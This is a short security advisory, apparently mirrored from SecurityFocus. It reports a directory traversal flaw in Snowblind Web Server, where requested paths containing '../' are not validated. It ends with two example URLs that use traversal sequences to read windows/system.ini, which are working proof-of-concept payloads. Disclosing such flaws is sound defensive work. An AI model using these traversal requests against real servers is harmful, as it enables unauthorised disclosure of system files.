8 lines
No EOL
468 B
Text
8 lines
No EOL
468 B
Text
source: https://www.securityfocus.com/bid/7618/info
|
|
|
|
It has been announced that Snowblind Web Server is vulnerable to a condition that may result in the disclosure of potentially sensitive information.
|
|
|
|
According to the report, Snowblind Web Server does not perform correct access validation on client requested paths which include "../" character sequences.
|
|
|
|
http://www.example.com/../../windows/system.ini
|
|
http://www.example.com/internal.sws?../../windows/system.ini |